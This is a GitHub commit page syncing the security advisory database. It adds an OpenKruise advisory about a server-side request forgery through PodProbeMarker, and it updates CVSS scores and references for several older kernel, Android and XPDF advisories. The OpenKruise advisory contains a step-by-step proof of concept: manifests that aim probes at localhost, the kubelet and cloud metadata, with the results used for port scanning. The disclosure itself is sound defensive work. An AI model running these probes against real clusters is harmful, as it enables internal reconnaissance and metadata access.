Skip to content

Commit 55528b0

Browse files
Advisory Database Sync
1 parent 1dc7ec6 commit 55528b0

120 files changed

Lines changed: 1965 additions & 221 deletions

File tree

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.
Lines changed: 88 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,88 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-9fj4-3849-rv9g",
4+
"modified": "2026-02-25T18:30:40Z",
5+
"published": "2026-02-25T18:30:40Z",
6+
"aliases": [
7+
"CVE-2026-24005"
8+
],
9+
"summary": "OpenKruise PodProbeMarker is Vulnerable to SSRF via Unrestricted Host Field",
10+
"details": "## Summary\n\nPodProbeMarker allows defining custom probes with TCPSocket or HTTPGet handlers. The webhook validation does not restrict the Host field in these probe configurations. Since kruise-daemon runs with hostNetwork=true, it executes probes from the node network namespace. An attacker with PodProbeMarker creation permission can specify arbitrary Host values (127.0.0.1, 169.254.169.254, internal IPs) to trigger SSRF from the node, perform port scanning, and receive response feedback through NodePodProbe status messages.\n\n## Kubernetes Version\n\n- Kubernetes: v1.30.0 (kind cluster)\n- Distribution: kind\n\n## Component Version\n\n- OpenKruise: v1.8.0\n- kruise-daemon: DaemonSet with hostNetwork=true\n- Affected CRDs: PodProbeMarker, NodePodProbe\n\n## Steps To Reproduce\n\n### Environment Setup\n\n1. Install OpenKruise v1.8.0 in kind cluster:\n```bash\nhelm repo add openkruise https://openkruise.github.io/charts/\nhelm install kruise openkruise/kruise --version 1.8.0 \\\n --namespace kruise-system --create-namespace\n```\n\n2. Verify kruise-daemon runs with hostNetwork:\n```bash\nkubectl -n kruise-system get ds kruise-daemon -o yaml | grep hostNetwork\n```\nOutput:\n```\nhostNetwork: true\n```\n\n3. Create test namespace and RBAC:\n```bash\nkubectl apply -f - <<EOF\napiVersion: v1\nkind: Namespace\nmetadata:\n name: tenant-a\n---\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n name: attacker\n namespace: tenant-a\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: Role\nmetadata:\n name: ppm-creator\n namespace: tenant-a\nrules:\n- apiGroups: [\"apps.kruise.io\"]\n resources: [\"podprobemarkers\"]\n verbs: [\"create\",\"get\",\"list\",\"watch\"]\n---\napiVersion: rbac.authorization.k8s.io/v1\nkind: RoleBinding\nmetadata:\n name: ppm-creator-binding\n namespace: tenant-a\nsubjects:\n- kind: ServiceAccount\n name: attacker\n namespace: tenant-a\nroleRef:\n apiGroup: rbac.authorization.k8s.io\n kind: Role\n name: ppm-creator\nEOF\n```\n\n4. Deploy victim workload:\n```bash\nkubectl apply -f - <<EOF\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: victim\n namespace: tenant-a\nspec:\n replicas: 1\n selector:\n matchLabels:\n app: victim\n template:\n metadata:\n labels:\n app: victim\n spec:\n containers:\n - name: victim\n image: busybox:1.36\n command: [\"/bin/sh\",\"-c\",\"sleep 36000\"]\nEOF\n```\n\n### Exploitation Steps\n\n5. Verify node-local port accessibility (kubelet healthz):\n```bash\nNODE_CONTAINER=$(docker ps --format '{{.Names}}' | grep control-plane)\ndocker exec $NODE_CONTAINER curl -s -o /dev/null -w \"%{http_code}\" http://127.0.0.1:10248/healthz\n```\nOutput:\n```\n200\n```\n\n6. Create SSRF PodProbeMarker targeting node-local port (as attacker):\n```bash\nkubectl -n tenant-a apply --as system:serviceaccount:tenant-a:attacker -f - <<EOF\napiVersion: apps.kruise.io/v1alpha1\nkind: PodProbeMarker\nmetadata:\n name: ppm-tcp-ssrf\n namespace: tenant-a\nspec:\n selector:\n matchLabels:\n app: victim\n probes:\n - name: tcp-ssrf\n containerName: victim\n podConditionType: ssrf.kruise.io/tcp\n probe:\n tcpSocket:\n host: 127.0.0.1\n port: 10248\n timeoutSeconds: 2\n periodSeconds: 5\nEOF\n```\nOutput:\n```\npodprobemarker.apps.kruise.io/ppm-tcp-ssrf created\n```\n\n7. Wait for probe execution and observe SSRF result:\n```bash\nsleep 10\nNODE_NAME=$(kubectl get nodes -o jsonpath='{.items[0].metadata.name}')\nkubectl get nodepodprobe $NODE_NAME -o yaml | grep -A 20 \"ppm-tcp-ssrf\"\n```\nOutput:\n```yaml\n name: ppm-tcp-ssrf#tcp-ssrf\n probe:\n tcpSocket:\n host: 127.0.0.1\n port: 10248\nstatus:\n podProbeStatuses:\n - name: victim-8596ff64d6-jklnb\n namespace: tenant-a\n probeStates:\n - lastProbeTime: \"2026-01-13T17:48:10Z\"\n name: ppm-tcp-ssrf#tcp-ssrf\n state: Succeeded\n```\n\nEvidence: Probe succeeded, confirming kruise-daemon accessed node-local port 127.0.0.1:10248 from node network namespace.\n\n8. Demonstrate port scanning capability (closed port):\n```bash\nkubectl -n tenant-a apply --as system:serviceaccount:tenant-a:attacker -f - <<EOF\napiVersion: apps.kruise.io/v1alpha1\nkind: PodProbeMarker\nmetadata:\n name: ppm-tcp-closed\n namespace: tenant-a\nspec:\n selector:\n matchLabels:\n app: victim\n probes:\n - name: tcp-closed\n containerName: victim\n podConditionType: ssrf.kruise.io/tcp-closed\n probe:\n tcpSocket:\n host: 127.0.0.1\n port: 9999\n timeoutSeconds: 2\n periodSeconds: 5\nEOF\n```\n\n9. Observe port scanning result:\n```bash\nkubectl get nodepodprobe $NODE_NAME -o yaml | grep -A 5 \"ppm-tcp-closed\"\n```\nOutput:\n```yaml\n - lastProbeTime: \"2026-01-13T17:51:08Z\"\n message: 'dial tcp 127.0.0.1:9999: connect: connection refused'\n name: ppm-tcp-closed#tcp-closed\n state: Failed\n```\n\nEvidence: Failed probe with \"connection refused\" message enables port state differentiation for scanning.\n\n10. Verify Pod condition and events:\n```bash\nVICTIM_POD=$(kubectl -n tenant-a get pod -l app=victim -o jsonpath='{.items[0].metadata.name}')\nkubectl -n tenant-a describe pod $VICTIM_POD | grep -A 10 \"Conditions:\"\n```\nOutput:\n```\nConditions:\n Type Status\n ssrf.kruise.io/tcp True\n ssrf.kruise.io/tcp-closed False\n\nEvents:\n Normal KruiseProbeSucceeded 96s (x24 over 3m26s) kruise-daemon-podprobe\n```\n\n### Source Code Evidence\n\n11. TCPSocket Host field used without restriction:\n\nFile: `pkg/daemon/podprobe/prober.go`\n```go\nfunc (pb *prober) newTCPSocketProber(tcp *v1.TCPSocketAction, podIP string) tcpProber {\n host := tcp.Host\n if host == \"\" {\n host = podIP\n }\n return tcpProber{\n tcp: tcp,\n host: host,\n }\n}\n```\n\n12. Webhook validation does not check Host field:\n\nFile: `pkg/webhook/podprobemarker/validating/probe_create_update_handler.go`\n```go\nfunc validateTCPSocketAction(tcp *corev1.TCPSocketAction, fldPath *field.Path) field.ErrorList {\n return ValidatePortNumOrName(tcp.Port, fldPath.Child(\"port\"))\n}\n```\n\nNote: Only port validation, no Host restriction.\n\n### Attack Scenarios\n\nScenario 1 - Cloud metadata access:\n```yaml\nprobe:\n tcpSocket:\n host: 169.254.169.254\n port: 80\n```\n\nScenario 2 - Internal service discovery:\n```yaml\nprobe:\n tcpSocket:\n host: 10.0.0.1\n port: 6379\n```\n\nScenario 3 - Node-local kubelet API:\n```yaml\nprobe:\n tcpSocket:\n host: 127.0.0.1\n port: 10250\n```\n\n## Supporting Material/References\n\n### Verification Evidence\n\n1. kruise-daemon hostNetwork configuration:\n```bash\n$ kubectl -n kruise-system get ds kruise-daemon -o yaml | grep -A 2 \"hostNetwork\"\n hostNetwork: true\n restartPolicy: Always\n```\n\n2. Successful SSRF to open port (127.0.0.1:10248):\n```yaml\nstatus:\n podProbeStatuses:\n probeStates:\n - name: ppm-tcp-ssrf#tcp-ssrf\n state: Succeeded\n```\n\n3. Port scanning result for closed port (127.0.0.1:9999):\n```yaml\nstatus:\n podProbeStatuses:\n probeStates:\n - message: 'dial tcp 127.0.0.1:9999: connect: connection refused'\n name: ppm-tcp-closed#tcp-closed\n state: Failed\n```\n\n4. Pod condition reflecting probe results:\n```\nConditions:\n Type Status\n ssrf.kruise.io/tcp True\n ssrf.kruise.io/tcp-closed False\n```\n\n### Impact Assessment\n\n- Confidentiality: Medium-High. Access to node-local services, cloud metadata, internal network resources.\n- Integrity: Low. Primarily information disclosure.\n- Availability: Medium. Resource consumption from probe requests.\n\n### Limitations\n\nHTTPGet probe rejected by webhook in OpenKruise v1.8.0:\n```\nError: admission webhook denied the request: spec.probe.probe: Forbidden: current no support http probe\n```\n\nTCPSocket probe remains vulnerable.\n\n### Remediation\n\nTemporary mitigation:\n- Restrict PodProbeMarker creation permissions\n- Apply network policies limiting kruise-daemon egress\n- Audit existing PodProbeMarker resources\n\nPermanent fix:\n- Enforce Host field restrictions in webhook validation\n- Deny private IP ranges (127.0.0.0/8, 10.0.0.0/8, 169.254.0.0/16)\n- Require Host to be empty or equal to PodIP\n- Sanitize error messages in NodePodProbe status\n\n---\n\n**Verification Environment**: kind v1.30.0 + OpenKruise v1.8.0",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/openkruise/kruise"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "1.8.0"
29+
},
30+
{
31+
"fixed": "1.8.3"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "Go",
40+
"name": "github.com/openkruise/kruise"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "0"
48+
},
49+
{
50+
"fixed": "1.7.5"
51+
}
52+
]
53+
}
54+
]
55+
}
56+
],
57+
"references": [
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/openkruise/kruise/security/advisories/GHSA-9fj4-3849-rv9g"
61+
},
62+
{
63+
"type": "WEB",
64+
"url": "https://github.com/openkruise/kruise/commit/94364b76adf3e8a1749a31afe809a163bed29613"
65+
},
66+
{
67+
"type": "PACKAGE",
68+
"url": "https://github.com/openkruise/kruise"
69+
},
70+
{
71+
"type": "WEB",
72+
"url": "https://github.com/openkruise/kruise/releases/tag/v1.7.5"
73+
},
74+
{
75+
"type": "WEB",
76+
"url": "https://github.com/openkruise/kruise/releases/tag/v1.8.3"
77+
}
78+
],
79+
"database_specific": {
80+
"cwe_ids": [
81+
"CWE-918"
82+
],
83+
"severity": "LOW",
84+
"github_reviewed": true,
85+
"github_reviewed_at": "2026-02-25T18:30:40Z",
86+
"nvd_published_at": null
87+
}
88+
}

advisories/unreviewed/2022/05/GHSA-69w4-9w32-v3qh/GHSA-69w4-9w32-v3qh.json

Lines changed: 7 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,18 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-69w4-9w32-v3qh",
4-
"modified": "2022-05-24T22:28:18Z",
4+
"modified": "2026-02-25T18:31:18Z",
55
"published": "2022-05-24T22:28:18Z",
66
"aliases": [
77
"CVE-2020-14381"
88
],
99
"details": "A flaw was found in the Linux kernel’s futex implementation. This flaw allows a local attacker to corrupt system memory or escalate their privileges when creating a futex on a filesystem that is about to be unmounted. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.",
10-
"severity": [],
10+
"severity": [
11+
{
12+
"type": "CVSS_V3",
13+
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
14+
}
15+
],
1116
"affected": [],
1217
"references": [
1318
{

advisories/unreviewed/2022/05/GHSA-6q4v-vwc9-rgq7/GHSA-6q4v-vwc9-rgq7.json

Lines changed: 7 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,18 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-6q4v-vwc9-rgq7",
4-
"modified": "2022-05-24T19:11:24Z",
4+
"modified": "2026-02-25T18:31:18Z",
55
"published": "2022-05-24T19:11:24Z",
66
"aliases": [
77
"CVE-2021-0641"
88
],
99
"details": "In getAvailableSubscriptionInfoList of SubscriptionController.java, there is a possible disclosure of unique identifiers due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-185235454",
10-
"severity": [],
10+
"severity": [
11+
{
12+
"type": "CVSS_V3",
13+
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
14+
}
15+
],
1116
"affected": [],
1217
"references": [
1318
{

advisories/unreviewed/2022/05/GHSA-8r42-h5pm-2vw2/GHSA-8r42-h5pm-2vw2.json

Lines changed: 15 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,18 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-8r42-h5pm-2vw2",
4-
"modified": "2022-05-24T17:40:39Z",
4+
"modified": "2026-02-25T18:31:18Z",
55
"published": "2022-05-24T17:40:39Z",
66
"aliases": [
77
"CVE-2021-3347"
88
],
99
"details": "An issue was discovered in the Linux kernel through 5.10.11. PI futexes have a kernel stack use-after-free during fault handling, allowing local users to execute code in the kernel, aka CID-34b1a1ce1458.",
10-
"severity": [],
10+
"severity": [
11+
{
12+
"type": "CVSS_V3",
13+
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
14+
}
15+
],
1116
"affected": [],
1217
"references": [
1318
{
@@ -38,6 +43,14 @@
3843
"type": "WEB",
3944
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CXAVDAK4RLAHBHHGEPL73UFXSI6BXQ7Q"
4045
},
46+
{
47+
"type": "WEB",
48+
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QOBMXDJABYE76RKNBAWA2E4TSSBX7CSJ"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CXAVDAK4RLAHBHHGEPL73UFXSI6BXQ7Q"
53+
},
4154
{
4255
"type": "WEB",
4356
"url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00010.html"

advisories/unreviewed/2022/05/GHSA-98cj-v6w2-849r/GHSA-98cj-v6w2-849r.json

Lines changed: 7 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,18 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-98cj-v6w2-849r",
4-
"modified": "2022-05-24T19:11:23Z",
4+
"modified": "2026-02-25T18:31:18Z",
55
"published": "2022-05-24T19:11:23Z",
66
"aliases": [
77
"CVE-2021-0642"
88
],
99
"details": "In onResume of VoicemailSettingsFragment.java, there is a possible way to retrieve a trackable identifier without permissions due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-185126149",
10-
"severity": [],
10+
"severity": [
11+
{
12+
"type": "CVSS_V3",
13+
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
14+
}
15+
],
1116
"affected": [],
1217
"references": [
1318
{

advisories/unreviewed/2022/05/GHSA-jfw8-prg7-m323/GHSA-jfw8-prg7-m323.json

Lines changed: 7 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,18 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-jfw8-prg7-m323",
4-
"modified": "2022-05-24T19:11:24Z",
4+
"modified": "2026-02-25T18:31:18Z",
55
"published": "2022-05-24T19:11:24Z",
66
"aliases": [
77
"CVE-2021-0584"
88
],
99
"details": "In verifyBufferObject of Parcel.cpp, there is a possible out of bounds read due to an improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-179289794",
10-
"severity": [],
10+
"severity": [
11+
{
12+
"type": "CVSS_V3",
13+
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
14+
}
15+
],
1116
"affected": [],
1217
"references": [
1318
{

advisories/unreviewed/2022/10/GHSA-x65r-rvgh-v43v/GHSA-x65r-rvgh-v43v.json

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-x65r-rvgh-v43v",
4-
"modified": "2022-10-05T00:00:38Z",
4+
"modified": "2026-02-25T18:31:18Z",
55
"published": "2022-10-01T00:00:18Z",
66
"aliases": [
77
"CVE-2022-20775"
@@ -26,6 +26,10 @@
2626
{
2727
"type": "WEB",
2828
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-priv-E6e8tEdF"
29+
},
30+
{
31+
"type": "WEB",
32+
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-20775"
2933
}
3034
],
3135
"database_specific": {

advisories/unreviewed/2022/12/GHSA-9v76-fx89-wh58/GHSA-9v76-fx89-wh58.json

Lines changed: 5 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-9v76-fx89-wh58",
4-
"modified": "2022-12-14T21:30:18Z",
4+
"modified": "2026-02-25T18:31:21Z",
55
"published": "2022-12-12T09:30:36Z",
66
"aliases": [
77
"CVE-2022-41296"
@@ -23,6 +23,10 @@
2323
"type": "WEB",
2424
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/237210"
2525
},
26+
{
27+
"type": "WEB",
28+
"url": "https://security.netapp.com/advisory/ntap-20230120-0003"
29+
},
2630
{
2731
"type": "WEB",
2832
"url": "https://www.ibm.com/support/pages/node/6843071"

advisories/unreviewed/2023/04/GHSA-j96r-2c7w-r3f2/GHSA-j96r-2c7w-r3f2.json

Lines changed: 7 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,18 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-j96r-2c7w-r3f2",
4-
"modified": "2023-04-26T21:30:37Z",
4+
"modified": "2026-02-25T18:31:22Z",
55
"published": "2023-04-26T21:30:37Z",
66
"aliases": [
77
"CVE-2023-26934"
88
],
99
"details": "An issue found in XPDF v.4.04 allows an attacker to cause a denial of service via a crafted pdf file in the object.cc parameter.",
10-
"severity": [],
10+
"severity": [
11+
{
12+
"type": "CVSS_V3",
13+
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
14+
}
15+
],
1116
"affected": [],
1217
"references": [
1318
{

advisories/unreviewed/2023/04/GHSA-jw72-cmc9-886w/GHSA-jw72-cmc9-886w.json

Lines changed: 10 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,13 +1,18 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-jw72-cmc9-886w",
4-
"modified": "2023-04-26T21:30:37Z",
4+
"modified": "2026-02-25T18:31:22Z",
55
"published": "2023-04-26T21:30:37Z",
66
"aliases": [
77
"CVE-2023-26935"
88
],
99
"details": "Buffer Overflow vulnerability found in XPDF v.4.04 allows an attacker to cause a Denial of Service via SharedFile::readBlock at /xpdf/Stream.cc.",
10-
"severity": [],
10+
"severity": [
11+
{
12+
"type": "CVSS_V3",
13+
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
14+
}
15+
],
1116
"affected": [],
1217
"references": [
1318
{
@@ -24,7 +29,9 @@
2429
}
2530
],
2631
"database_specific": {
27-
"cwe_ids": [],
32+
"cwe_ids": [
33+
"CWE-120"
34+
],
2835
"severity": null,
2936
"github_reviewed": false,
3037
"github_reviewed_at": null,

0 commit comments

Comments
 (0)